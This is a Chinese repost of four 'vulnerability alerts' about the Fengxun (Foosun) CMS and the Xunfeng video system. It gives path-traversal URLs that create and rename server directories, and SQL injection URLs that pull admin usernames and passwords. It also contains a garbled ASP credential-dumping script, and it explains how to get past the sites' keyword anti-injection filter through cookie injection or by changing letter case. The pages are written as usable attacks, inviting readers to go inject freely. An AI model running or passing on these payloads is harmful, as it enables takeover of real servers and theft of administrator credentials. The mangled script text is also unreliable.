“gzroyal”通过精心收集,向本站投稿了4篇风讯浏览目录创建文件漏洞漏洞预警,这次小编给大家整理后的风讯浏览目录创建文件漏洞漏洞预警,供大家阅读参考,也相信能帮助到您。

篇1:风讯浏览目录创建文件漏洞漏洞预警
简要描述:
通过测试发现该程序FolderImageList.asp FolderImageList.asp FileManage.asp 几个脚本程序在处理用户提交的恶意路径参数时没有进行控制过滤,导致攻击者可以进行服务器目前查看,创建等操作,恶意攻击者可以利用该缺陷进行脚本木马的创建利用,导致服务器被控制,
详细说明:
先注册用户名登录我后执行下边的命令就可以了
1 游览目录文件
192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/admin/
2 创建一个目录
192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/123456/
3 修改一个目录名称
192.168.1.62/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
篇2:风讯CMS 0DAY exploits漏洞预警
关键字: inurl:User/Reg_service.asp
风讯的注册页面...
漏洞页面:/user/SetNextOptions.asp
利用方法:
构造注入
 user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
“admin_name”管理用户名数据库表
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
“admin_pass_word”管理密码数据库表
把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
DE>
要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员
第”&id&“位的管理员
”response.write “
网站后台地址
”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “
------------------
帐号:”&mid1&“
”x.open “get”,webpass,false x.send str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “
密码:”&mid2&“
------------------
” response.write “
爆出咯,可以YY了
cmd5” set x=nothingend if%>DE>
具体的利用方法请参考源码,
风讯CMS 0DAY exploits漏洞预警
,
篇3:风讯.net版任意代码执行(官方已经demo)漏洞预警
注册用户,发表文章,抓包改包,打死
先看看上传目录有没执行权限,发现没有,看来要在包里做手脚
篇4:讯风影视系统 注册处注入和鸡肋的防注入漏洞预警
影响版本:迅风影视系统
:www.gxwglm.com
漏洞类型:SQL注入
漏洞描述:讯风影视系统存在多处SQL注入漏洞,
#1.注册处注入:
wwwroot\reg\reg.asp
<% szPath = “../../” %> /*包含了也可以绕过 请看#2*/ <% if Request.Form(“submit”) “” then szUserName = Request.Form(“UserName”) szPassWord = Request.Form(“UserPass”) szEmail = Request.Form(“UserMail”) szMemo = Request.Form(“UserMemo”) iPayMode = Request.Form(“PayMode”) szPBQuestion = Request.Form(“PBQuestion”) szPBAnswer = Request.Form(“PBAnswer”) szGetCode = Trim(Request.Form(“codestr”)) szSQL = “SELECT * FROM MOVIE_Users WHERE UserName='” & szUserName & “' OR UserEmail='” & szEmail & “'” set rsData_User = Server.CreateObject(“ADODB.Recordset”) rsData_User.Open szSQL,conn,1,3 if not rsData_User.EOF then Response.Write “” Response.End else iAccount = 0 if Session(“Option_RegMode”) = 1 then iAccount = 10 If IsEmpty(Session(“VerifyCode”)) Or szGetCode CStr(Session(“VerifyCode”)) Then Response.Write “” Response.End end if if Left(szUserName, 1) = “!” then Response.Write “” Response.End end if szSQL = “INSERT INTO MOVIE_Users(UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus) ” szSQLszSQL = szSQL & “VALUES('” & szUserName & “','” & MD5(szPassWord) & “','” & now & “','” & date+30 & “','” & szEmail & “','” & szMemo & “',” & iPayMode & “,'” & szPBQuestion & “','” & szPBAnswer & “',1)” conn.Execute szSQL Response.Write “” Response.End end if rsData_User.Close end if UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus 等等变量都经过很鸡肋的防注入过滤就insert进movie_user里面 一切都是防注入惹的祸
wwwroot/Conn.asp
<% Response.Addheader “Content-Type”,“text/html; charset=GB2312” Response.Buffer=True Server.ScriptTimeOut=9999999 '防注入 if nochecksqlin1 then dim sql_injdata,SQL_inj,SQL_Get SQL_injdata = “'|exec |delete |insert | update |select ” SQL_inj = split(SQL_Injdata,“|”) If Request.QueryString“” Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then Response.Write “” Response.end end if next Next End If If Request.Form“” Then For Each Sql_Post In Request.Form For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then Response.Write “” Response.end end if next next end if end if %>
#2.1 防get 防post 就是没防cookies注入
利用在wwwroot/FZPLAYER.ASP处:
<% Progid=Request(“progid”) Set Rs=CreateObject(“Adodb.RecordSet”) Rs.Open “Select * From Movie_FileList Where FileListID=”&progid,Conn,1,1 Response.Write “” Rs.Close %>#2.2
SQL_injdata = “'|exec |delete |insert | update |select ”
SQL_inj = split(SQL_Injdata,“|”)
过滤的关键字少是一回事 主要是大小写都没注意到,
Exec这样的就可以绕过防注入 大摇大摆的注入吧各位黑阔







